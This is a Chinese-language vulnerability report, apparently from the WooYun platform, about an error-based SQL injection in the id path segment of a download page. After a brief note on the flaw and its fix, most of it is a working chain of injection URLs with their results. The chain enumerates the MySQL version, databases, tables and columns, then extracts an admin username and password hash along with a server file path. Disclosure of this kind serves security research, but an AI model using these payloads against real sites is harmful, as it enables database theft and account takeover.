http://www.wooyun.org/bugs/wooyun-2010-01666
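之前想找个目标测试，没想到这里就有，测试一下，做个记录而已。从下面的语句看，注入点是 URL 路径中 id 段的值：单引号未经处理就被拼进了 SQL，结果应是通过数据库报错回显读出的；修复上应对 id 做整数校验并改用参数化查询，同时关闭对外的错误回显。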
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php
或者
/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test
/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd